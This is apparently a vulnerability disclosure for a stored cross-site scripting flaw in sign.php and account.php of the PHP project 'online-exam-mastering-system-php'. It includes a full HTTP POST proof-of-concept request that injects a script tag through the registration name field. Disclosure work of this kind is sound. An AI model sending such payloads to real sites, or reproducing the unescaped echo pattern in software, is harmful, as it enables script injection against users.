# code-projects online-exam-mastering-system-php has Cross Site Scripting vulnerability in sign.php and account.php ## supplier https://code-projects.org/online-exam-mastering-system-php/ ## describe In sign.php and account.php .There are unrestricted cross site scripting attacks and injection attacks in the online-exam-mastering-system-php. The controllable parameters are as follows: nome parameter. This function will execute the user parameter without restriction into the echo statement. Malicious attackers can exploit this vulnerability to obtain sensitive information from clients ## Code analysis ![image](https://hackmd.io/_uploads/B1J7k-mHyx.png) ![image](https://hackmd.io/_uploads/H1MB1ZQryl.png) Querying and storing data from the database directly and echo out it without filter, resulting in the execution of XSS statements. ## payload ``` POST /sign.php?q=account.php HTTP/1.1 Host: 192.168.0.143 Content-Length: 129 Cache-Control: max-age=0 Accept-Language: en-US Upgrade-Insecure-Requests: 1 Origin: http://192.168.0.143 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.0.143/ Accept-Encoding: gzip, deflate, br Connection: keep-alive name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&gender=M&college=aaa&email=aaa%40aaa.com&mob=123456&password=123456&cpassword=123456 ``` ## result ![image](https://hackmd.io/_uploads/BkejPxXHJe.png)